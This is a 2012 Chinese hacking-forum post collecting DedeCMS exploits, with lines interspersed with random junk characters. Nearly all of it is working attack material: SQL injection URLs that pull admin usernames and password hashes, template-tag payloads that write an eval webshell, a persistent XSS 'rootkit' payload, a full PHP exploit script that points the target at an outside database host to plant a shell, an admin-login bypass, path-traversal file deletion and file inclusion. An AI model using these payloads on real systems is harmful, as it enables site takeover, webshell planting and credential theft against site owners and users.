中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]

作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结

! j5 z6 d6 b' iDedecms 5.6 rss注入漏洞9 c" z# T! S( A) V2 S; \  `
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
* V4 u, v. j4 R- e: J# S# k7 @0 y
) x6 D4 ?" W: Z# _6 \) R; N/ E" d' n: l
* o9 v5 y' C+ L" u

$ I1 N% x: u" @1 x; ^: U
" k6 Z: K: @5 [
9 e$ v  b% F: [+ b( h3 y5 p+ ]: z2 o1 N
1 V6 p6 H9 s- C
DedeCms v5.6 嵌入恶意代码执行漏洞
6 P2 `  `+ D" \( i( r注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}8 h1 O8 x/ P( t# ^7 u+ B! s: r! W
发表后查看或修改即可执行
9 [9 |# z% o1 _a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
$ V! F! A  e" j% v7 Y3 G$ u生成x.php 密码xiao,直接生成一句话。( f) {) t& r1 N# K" E" E7 Z
5 u; O5 e. R) Y6 u

( Y' _: z  @& {5 p  W) e  x
: \9 `) g% O2 m. r; ^: L- @" H. w+ Y" p3 s

& [& w0 d- m' T, D; b8 j. f/ g% i7 U
, D! E  s7 y* \& B* [

7 H) j5 `1 D9 j1 m) J- z' W" y4 D0 W) ]Dede 5.6 GBK SQL注入漏洞  D$ H( _4 n+ H) s; k# Z
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: J  i7 m4 P, _3 A# Q
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe; K4 h1 O; @( u5 ]% [% t
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A73 s  P. \0 B9 _4 b: y& j

( e% q+ @- a! E) ~$ j/ ]7 J7 }3 c( D9 H! A- S& }; [
2 ?& P. z& w# Y
+ ]7 P8 m& M7 |2 V) e
& e! t0 U2 [: S; u

% r4 n8 w2 ^' s8 m' k
; K. E6 a9 P) X( ^
: O# B) B2 y) k2 zDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞3 }7 f% e5 u! m- K
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 e' q- ]* Y- L& E. z5 R
& z1 G) n% z& W  f: ~& A) s! g5 g/ Q5 O* g
1 `+ p2 D1 n  J6 z$ E  {7 `. ]
+ E6 b+ q' A: L+ G

# u3 h/ n( i* o6 t
0 y$ I; M: e1 ODEDECMS 全版本 gotopage变量XSS漏洞$ U1 U# ]( ?; l8 I" \1 \# e8 r
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 + @* p' ~0 H" S3 E0 j
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="8 ]- h2 w9 l! C5 @% ^+ n$ a. q4 a
' U3 H( s  B. ~+ I5 r6 U

' s' I2 k/ v$ z7 L2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
5 r3 w( X: M! N0 d+ T" g
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
6 j7 g- v/ \: c
& q. a6 r/ j6 K$ i
7 _6 [2 l/ u( q- \4 j" U" Hhttp://v57.demo.dedecms.com/dede/login.php
1 \$ Q+ `% P: k. v. O7 T, D
& @4 `% ^$ l& G2 K0 L2 z( A. B3 F; E3 b. N
color=Red]DeDeCMS(织梦)变量覆盖getshell+ n8 E" l# E6 a: Y  ]4 J
#!usr/bin/php -w3 \' S6 o4 a; ^$ ~1 y* b# y0 K
<?php( S) ~- V# k6 T$ h3 M4 P6 B( T
error_reporting(E_ERROR);
( i' S: V1 ~+ o9 m) l" jset_time_limit(0);+ G# e; b& V  a$ L' A# C; ^1 E
print_r('- f0 Y) U, @9 F
DEDEcms Variable Coverage& O, K: a$ j+ ^8 R
Exploit Author:
www.heixiaozi.comwww.webvul.com' K, Z) V& a5 }: r6 g# h9 v7 p
);
3 R% b" b7 S- oecho "\r\n";
; m+ i9 d; O. q% y6 z2 ]if($argv[2]==null){
6 A! C0 l6 z% V3 M2 t  H2 \print_r('
# b4 M( B# y5 Q' ?: G; T% n+---------------------------------------------------------------------------+
8 r1 T( L" \( V. s! a& CUsage: php '.$argv[0].' url aid path' Z0 ?# M( I) I$ H
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
# Z3 i( X: ]0 b$ ]( u  B" t6 JExample:
& ^7 @1 i/ R/ Xphp '.$argv[0].'
www.site.com 1 old, S# G' {6 I) x0 J
+---------------------------------------------------------------------------+
4 `2 B# Q( S6 V0 r  [: {$ N) r');- p# `' }7 v2 y  n3 S+ s
exit;8 v/ z' m$ m  V. Q9 ~' Z( F# l
}5 ?- M* l7 [3 t( y) i" B) j, s6 M
$url=$argv[1];
7 n5 t, w3 Y* }7 f$aid=$argv[2];
, u0 t( Y: P! ^6 K1 b$path=$argv[3];
1 e$ j, c! X6 Y# ?2 p5 E' a$exp=Getshell($url,$aid,$path);
5 r+ L7 g# z3 e1 R# _if (strpos($exp,"OK")>12){
* ?5 ~# t2 w. M. S# oecho "
+ R3 D; g( h/ J0 R, `. N1 bExploit Success \n";
& r  `) O5 ^% \( Gif($aid==1)echo "
3 v( D2 ^; N7 @3 R( RShell:".$url."/$path/data/cache/fuck.php\n" ;8 v" x7 s7 z0 d* u. s7 H' T

5 V, }# Y5 b0 p; u. E; U2 @+ i$ S2 G- w
if($aid==2)echo "# o+ p9 o. [7 J7 k/ F& @8 u. y) x, O
Shell:".$url."/$path/fuck.php\n" ;
6 L" i7 k0 h6 D  B/ q$ f4 c' W6 N; P5 z% ~: I4 g
& Y1 d5 N/ L( u& v! `. X( N7 Y0 L6 P
if($aid==3)echo "/ a% Z* G6 A- \, M; |
Shell:".$url."/$path/plus/fuck.php\n";
! o. B& P" K4 O# c2 ~
# f& \6 V( H3 e) P  B& o1 P0 |( y% h3 Q0 l! U, N9 @7 Z
}else{
% b  A/ X5 i) ^echo "
% d+ z4 B- p& H" h- I6 x% D/ U* L; xExploit Failed \n";& v/ j" k7 g4 W! t# e# j' y
}
1 s- Z) |! e* c$ Q% p1 c, Tfunction Getshell($url,$aid,$path){3 y% D# F1 X2 R0 ]8 \
$id=$aid;
  w9 [" A: z6 S; X! y$host=$url;
" x% W( ]$ [- R# q7 a+ _5 @$port="80";
  e( Z3 B2 Q+ w+ Z/ R$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";" I6 _& |. }. G' s" b& q
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
4 h7 B6 D, u) g( F. T) S$data .= "Host: ".$host."\r\n";
+ |; y; U( ?8 P/ H% J$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";8 X+ M# h% `0 _( Q$ ?- ?; c5 f0 g
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";/ g5 H' [5 _9 h6 e& q4 Y- X, i. E
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
6 h) x7 l+ c8 V1 h  n2 q- M  z8 T+ L; w//$data .= "Accept-Encoding: gzip,deflate\r\n";
( E9 N5 L* H0 [% L$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
' m# Y5 h+ E5 z- d$data .= "Connection: keep-alive\r\n";
4 L' i9 x3 k) e6 Z  Q) k5 ^$data .= "Content-Type: application/x-www-form-urlencoded\r\n";" Z. u+ ^$ y( t! h6 [
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
. \3 }- Q+ d" x$data .= $content."\r\n";
# j1 k; ^9 ?& w* t$ock=fsockopen($host,$port);
* g2 U# c. g3 Y" B6 F6 qif (!$ock) {! d: X& F3 R; ~5 u# `  ]$ P. m; F
echo "3 v) P; L1 i$ y; ]
No response from ".$host."\n";
0 `1 k8 T! v3 H  A( h; G. R}3 H# d, _% S. m1 T( [
fwrite($ock,$data);
8 o( W0 D+ o+ F0 Y+ ?while (!feof($ock)) {  _. A0 T+ r2 y' K6 E
$exp=fgets($ock, 1024);5 P' h% o# l% n/ s7 N% f7 r; @
return $exp;
! e/ ]- R5 d. ^: f}
, e, h6 X- A0 P3 ^' ^}( l, q6 _: |% B1 P( O
. V! Z  `" ~# }6 R& u: {
5 c7 w. o: O2 o$ g: F
?>+ E, \8 Z: h8 ~  f0 s4 A
1 v2 U" C7 K1 ?0 }: m  i( K# B

  Z# }0 c7 a1 G' g, a* c1 R+ x. s0 P, }( }- H: h0 X% c

! N" h- b& {$ P% G2 }# o7 _8 {+ y9 ]& F$ }7 F% i. }

  K* H9 c0 b7 E
1 I& b: v2 C; j' q& {" D: T- H+ o7 ~+ }) g  ~. R
& J. y$ U$ f* z4 S  G; Y  c
4 P% ]# L9 X5 S# N3 T! J
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
( |! `- D  q: s  Y7 L  b
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root& h+ l; h" U! a. x2 d
) B9 ?- y# M( j# t' }

$ l: p1 r+ c+ E$ @1 o( c. a把上面validate=dcug改为当前的验证码,即可直接进入网站后台
* m: o) B8 p& s/ O0 l5 Z: j( G
* J- ?: z" {) U; r  x: V
: z2 x  m0 k" E4 ]4 K- o0 C) _+ Q此漏洞的前提是必须得到后台路径才能实现3 J2 D  b* u/ G9 r7 p
: n5 e  W- _8 ^5 m

; O. @: }" m) ^
* Y! P4 l- ?( s3 m# N
# q+ J0 g3 m; R8 M/ b+ D/ j) s. V
% j+ ~  F4 Z& `' z
! t" z9 \0 l6 D! x" p: e  c
" `2 O0 Y4 w# s) n7 a1 U
) H4 G; P$ q) F- G! ^: |* d$ I, ~9 i  A" V

& U( u( i. p8 Z% C0 CDedecms织梦 标签远程文件写入漏洞' |& r9 ]2 n5 v3 ~
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');7 k& G) }7 k; y4 r( Z, F# C
; D6 u. u$ {) y5 I" ]) G0 B' V' u1 U

7 x! X! f. ]( i再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 " c. C1 l! r1 N$ O" J
<form action="" method="post" name="QuickSearch" id="QuickSearch">' ^8 Q& l4 _4 ^# F7 T6 F
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
6 U$ E2 c3 O; J1 N$ U% N<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" q7 d5 ~/ w; w1 a<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
  x' P3 X: n6 O+ n$ t: X, `- B<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
/ x, B; ^5 ?4 D9 L5 `<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
) h! J- l$ t; @* W( @- p9 a3 ]<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; i" z/ a# V: R: [% I) c<input type="text" value="true" name="nocache" style="width:400">
$ Z2 ?7 y% J& E/ v5 L0 K& y<input type="submit" value="提交" name="QuickSearchBtn"><br />
6 D; [: _6 v5 D7 p5 q& E</form>) g; x/ Q5 _9 }2 g9 N6 L5 X
<script>. Y+ w) @* z* I' m% W) R
function addaction()1 ~6 O3 N/ [& K8 Y' j& }
{0 {- ~; p" ^8 ?3 K
document.QuickSearch.action=document.QuickSearch.doaction.value;
( b/ F. \8 [$ e6 D}# j7 B' A) P  y$ c4 d" O
</script>4 Q2 _2 X# F' B4 U

0 ~# Q/ m& @6 k  A6 g' ?' }' Q1 S. v% O9 Y* I
/ M: J9 s' |1 Q8 b. }; V

8 ?- j+ s6 M5 m/ C( T2 c- _
- |0 J# o7 P' [% b0 G+ x6 `) ]( F2 ]# P' b1 O

0 @9 Z1 Z/ [9 C( l: T& y9 _4 v6 M
% v/ P# ~. d: c& j7 F
9 L. j9 A: l6 ]. ^3 J9 z! r' w5 C' D. \7 N
DedeCms v5.6 嵌入恶意代码执行漏洞
8 W! |/ s, k2 h注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行* e/ |% d" W* x. ~+ |$ j, J
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}: |0 G# @5 }, u5 e3 _( E5 `
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得; t& A2 l. u" R
Dedecms <= V5.6 Final模板执行漏洞
0 C% v( Y; c/ `2 J注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
- k; [* q# B& T" R5 M0 y9 cuploads/userup/2/12OMX04-15A.jpg
9 ?; W& \/ R4 r- S! r* }/ C
& c) b4 A! k: w$ }
3 E" i% e9 r8 N5 c: f模板内容是(如果限制图片格式,加gif89a):
1 K8 v. G0 n9 Q! F& H8 }{dede:name runphp='yes'}7 `, k' @: I9 b- P$ n" ~* h
$fp = @fopen("1.php", 'a');. b" N: W, o* P0 U4 l) I) H7 s
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
# ~6 G$ X9 R7 d6 x! ~4 S" y: U@fclose($fp);
9 |4 ?* s+ g8 O9 }6 S{/dede:name}
! g& }8 ~# D/ `% X2 修改刚刚发表的文章,查看源文件,构造一个表单:& D& I6 K6 [$ O
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
" _0 Q$ o7 x5 O<input type="hidden" name="dopost" value="save" />3 N* m9 i2 g& r; F! G6 X
<input type="hidden" name="aid" value="2" />
6 a& S2 \. z; h$ S* q$ p( x<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
1 k" n. S3 P; T2 Z7 c/ K<input type="hidden" name="channelid" value="1" />
8 W; D" ^1 y8 r$ m  T  ~<input type="hidden" name="oldlitpic" value="" />! x  q) T( F4 B5 ?; A- K& W
<input type="hidden" name="sortrank" value="1275972263" />
. Z6 H7 L+ d# p; P+ a  H+ B6 H; r9 }
$ H% V( X- ]$ T7 t0 i+ S8 `: _7 D% j" @" g& g: }
<div id="mainCp">
8 L  ]5 `4 b3 w# a4 E1 S! k<h3 class="meTitle"><strong>修改文章</strong></h3>
( @9 b7 a! a# h6 O  J8 M# V1 t  o/ \0 `8 O
. c2 J, o2 `- B' q) Y! a
<div class="postForm">
0 n# K  N) b2 i/ Q0 w/ {1 y: o<label>标题:</label>
" D( d) P3 g$ }; \  u<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
4 g5 T4 \: ]# N8 o+ |
1 I. L$ G- t/ G7 {
# B2 C8 a. w+ c5 w<label>标签TAG:</label>
, D2 j! ]0 [/ \, P<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
+ ]( D& C- w) P" r0 G3 w. ?9 w8 v! [. l9 [
1 o2 M! b5 t3 y' w' z7 b. R8 y
<label>作者:</label>7 p7 S" F& J# u" Z/ L
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>6 |! X: W2 W6 S/ L! L/ D

; }, @/ Q- s& O+ T! w5 p+ X
0 T2 l4 M- J, G2 e  n$ Z<label>隶属栏目:</label>
7 n2 u/ @$ h& Q) ^/ j, k<select name='typeid' size='1'>7 h4 \$ X  Z0 b, i; A5 N! L
<option value='1' class='option3' selected=''>测试栏目</option>: `% L% [- P7 m) ]5 y2 \, u
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)" l& y# V# p6 Y! {8 ]! I& T

- G8 P0 y5 p2 o  n. h0 m7 c: ~* O5 Z7 N' [3 V
<label>我的分类:</label>
; j% |# ?" z% g' F" Z/ B. B<select name='mtypesid' size='1'>+ ]4 }4 N9 \# r) _
<option value='0' selected>请选择分类...</option>
1 ?" z  C8 K- z<option value='1' class='option3' selected>hahahha</option>
7 _; `5 l; i; Y+ _</select>
: l; j' ~" Y# ~: m' u/ }, C) m& `2 [7 Y3 Z4 \9 D+ K  t
9 u$ I+ i/ k, R. _/ i1 f
<label>信息摘要:</label>8 {9 Z8 j! _+ [; B5 B
<textarea name="description" id="description">1111111</textarea>
, U( e. K+ `' m7 O2 J(内容的简要说明)% p5 `+ L+ m2 F2 t4 w. Y
. n7 A6 O3 `: s9 u3 H" S5 u+ m6 N
+ E  n' Q) i: V1 W/ p2 z
<label>缩略图:</label># [! E4 @9 f3 o4 [
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
6 E, Z9 X4 k' ~( s) y8 I% l% f: G* M

% t0 t# i* [2 {& @; ]2 O1 @/ j8 z<input type='text' name='templet'5 b5 o6 d, X/ J1 R& G7 @
value="../ uploads/userup/2/12OMX04-15A.jpg">
- Q& U- n8 P  h8 D<input type='text' name='dede_addonfields'
5 L! _# D& a) `0 G( G5 l9 |2 gvalue="templet,htmltext;">(这里构造)) P% N# Z) x6 q- V; W
</div>5 U1 l, ^; M0 ?

. w+ W( k) ^( x/ M4 M7 d  ^6 i& {8 G1 k- p/ U
<!-- 表单操作区域 -->
7 M- H& h" `. j. P& |<h3 class="meTitle">详细内容</h3>$ Q; H, A4 z, p5 t  Y# |

# u/ x$ R7 A# ]8 H1 W3 F, ~6 I4 f) `
<div class="contentShow postForm">1 J/ Z3 A& [/ `" w* \( D" s8 P
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
: K3 \6 b3 D8 ^; [, b: H$ u+ `4 c1 b1 c3 _; t, ]
+ R" _0 a! M6 R! P/ V, _
<label>验证码:</label>
! S( o4 J5 {2 }' j9 X3 `<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />/ R& M8 Q1 B) G, J. `
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />7 z$ |# e- q, L+ ?  |5 Q

  S& \3 K1 @  `! p
/ p0 {6 u. D+ a- j: J1 @<button class="button2" type="submit">提交</button>
* ?2 ?' l$ m- I" z; G/ {<button class="button2 ml10" type="reset">重置</button>+ l* S0 ~% Z) O& E3 x+ n
</div>. t2 A' Z. s, w2 I3 F5 i. Z# |
( d1 v$ Z1 D& T3 ?3 S' B
- ~6 l1 }4 w) O6 {, j( Q
</div>
( {& T4 z8 ~  c9 z8 l* k+ h
# H/ D; L9 O0 ]8 ?0 R7 N' g& \  _8 e# u; G
</form>
+ `6 A/ c% F8 _* \: F! k; F% k8 A; j5 b  U( v1 i# w
! w. j* ^6 B$ J: P0 X" v1 Q
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:. ]/ }! N3 j0 w6 [% h- v% l
假设刚刚修改的文章的aid为2,则我们只需要访问:( d, k( g( ]7 T; n
http://127.0.0.1/dede/plus/view.php?aid=2
$ a% Y# p" m: ^; u: }0 P: B即可以在plus目录下生成webshell:1.php1 C3 y; A& l6 P+ ]

2 q; L7 f( k- ]% j/ Q, ?" N1 u5 s' l) K- k6 Y
: B. C8 v* V7 L/ Z
0 `) z. E0 P2 W2 q% F' j  P

* i% Q) l. @- F! x8 H2 d6 A! y
. C. f6 k* F& r' B* I5 E2 d- z! U) M9 Y% W
/ w8 R8 h( w+ A  p  V

! }  P3 Z$ G7 W, ^8 S
/ m$ f# v0 Y* v- a( U* ~8 Q) ^( i3 z9 a5 H% `0 Y0 Q/ `3 ?
  Y, S5 }. T, U9 V5 L
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)2 a! H1 N- ]0 `
Gif89a{dede:field name='toby57' runphp='yes'}
% A8 k. R! k* Aphpinfo();& R5 u. H/ e0 s
{/dede:field}8 T9 ]6 R* P0 w3 L
保存为1.gif4 D* O' b  U2 l. e0 ^/ w
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' m/ @$ b: n# W1 ~& ^; G- C
<input type="hidden" name="aid" value="7" />
2 `1 C" e: `2 |1 D& i5 {' Z6 R$ r<input type="hidden" name="mediatype" value="1" />
8 D9 P$ X6 T/ m. R<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
# p. ]1 R8 [8 `! r<input type="hidden" name="dopost" value="save" />
# ^' J5 E" I5 m8 l& B. d4 z<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> " r* E5 f; L& d4 e1 z% J
<input name="addonfile" type="file" id="addonfile"/>
0 c* D; _# a* U/ C<button class="button2" type="submit" >更改</button> ! z$ [$ d3 c. B! x3 U; ]" q
</form> & c1 S9 s) |$ o7 \
$ u, f4 p! h2 `3 t/ k+ E
% M& _7 W; k0 P
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
: @8 i+ m7 q) q1 _发表文章,然后构造修改表单如下:2 x, \  ^) d( J  o6 H7 u* z

* C: R3 {5 ~% x+ D
3 Z3 v& s8 b! e' f0 ]! t' V2 O. h<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 1 m9 f+ M, J/ ~2 x9 g4 ]
<input type="hidden" name="dopost" value="save" /> . V+ A! F' ]8 I1 h8 y. ^$ J
<input type="hidden" name="aid" value="2" /> ' H! t$ B: h) l6 W& d
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
4 i% O3 O7 h* C" r6 M<input type="hidden" name="channelid" value="1" />
. x+ T: U. l7 F" t/ g4 E; M( |<input type="hidden" name="oldlitpic" value="" /> $ [) d( m6 w  j, Y" X9 q2 D
<input type="hidden" name="sortrank" value="1282049150" />
5 l8 }1 [5 v4 y7 A<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>   F% [! N4 \" A
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
/ @3 @/ |6 ~) L/ N  L; v<select name='typeid' size='1'> 3 Q  @2 K3 V8 b* y, a
<option value='1' class='option3' selected=''>Test</option> 9 ~; u# X5 D+ k3 N( P( t3 a9 c
<select name='mtypesid' size='1'> / n$ X- G0 g" T2 g
<option value='0' selected>请选择分类...</option> 2 k  Z- d/ q5 ~* f9 N  D- ~
<option value='1' class='option3' selected>aa</option></select>
6 q3 W& Y: C( S( Q<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
( c0 S! ?. @! J" c<input type='hidden' name='dede_addonfields' value="templet">
/ Y) D( L* y# g' W. c: V. ~5 j' s+ R<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 7 b" c* S3 o/ _' `/ q+ \3 o2 F
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 1 u# N( H" ~9 i7 H
<button class="button2" type="submit">提交</button>
  d7 v0 {8 S! V7 Y6 S</form>- ?( ~) C! C% c+ V! N: D( M

! E4 O- O+ k  K) }; b
% b! R4 {) l  h" D' K" y/ c% e4 V9 B; v- D( y: a( w' [  y) I
' C- Q# I3 n+ p
7 b  q8 _& J" E4 P

+ `. A2 B0 \" L  x( n4 r9 D& |
2 p( X  U* A3 t1 G9 L$ D. A7 r3 L$ J- C& c8 j
% m( H0 C8 P9 [$ ^; `- J
3 r+ D- y7 p1 I' m* I

5 Q8 r% \, e+ f/ T  j  [
" e0 O! H+ q4 F! {, |' p7 P织梦(Dedecms)V5.6 远程文件删除漏洞  N# x# S6 Z( y9 `  S4 T7 @, J
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif! f6 s: q2 g9 B- _  q* i! L, J

7 Z4 f4 X$ k  `$ k. [" b, m6 p% g: X7 e" g- h/ j
- H0 b4 l+ z8 I, A3 E3 U- H* I5 R# U

1 F, R, Q$ f4 l7 q; ~0 W+ \5 H  V* y3 Y0 D! h* m) N; }/ j: E, z
- S0 n) e, |5 v$ E' i* J

7 l" Z) _5 O( z( \
1 W( m! h, J3 r" N: n0 @7 b9 C
9 ^5 ?6 r% U. N1 X. s. j* n
  b; K# y$ }" R; G2 E织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
/ K2 V2 K' N, n- D6 f
http://www.test.com/plus/carbuya ... urn&code=../../
- i/ G3 j$ y5 F+ G
4 F: i7 y( E. v3 h
' w" M+ N! S: i( F+ X) t- f
$ t4 k3 c3 t: R$ V' Z5 U
  ]$ K: M8 J0 S2 {$ K; u
& f! N9 ]2 Q) W" ?# R0 ?0 }
5 K. ]% w3 Y: e/ i0 S% x. h
9 e# K1 Q+ y9 r/ G
3 @0 x. j: P8 S( f6 Z( d
( _4 `/ U( |( Q" A- s4 Z0 r" ?+ m, l5 ~' N* f: H; Q6 N6 I" ]
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
3 V4 r8 f# W- c" Kplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
$ r' U" K9 H) g6 K) q密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
! e! Q6 l. T1 m  e# T
8 z/ Y. o) B; v4 @* Q. ~" A
. M4 {( ^6 A: q9 h, h" z9 A( C" ^) I. v% X/ c4 R) I4 X) D
8 h" C2 M, z# u% h

5 @% U4 }9 _& E: _7 f6 @# A
3 @; q3 \3 P1 O, v$ b% G; `: Y; J* Q! p- q0 W5 `
2 m3 ?- H4 q! w! `8 O8 O9 D
$ R2 V! E/ h$ k; ^7 J) ?- s  k

% H9 x& |& ~2 r. r) V9 B织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
# s- _4 O3 ?( R' a* Z2 Khttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
7 m+ K# R' C( |, K, U: m  I7 p6 A; S/ w7 h; G+ I) i# M) y

2 ?& g4 W* i1 p0 W
& d3 ^7 |2 m* m: `1 U! t: Q* W- F2 h# B% r& Y, @+ p6 x9 [& f

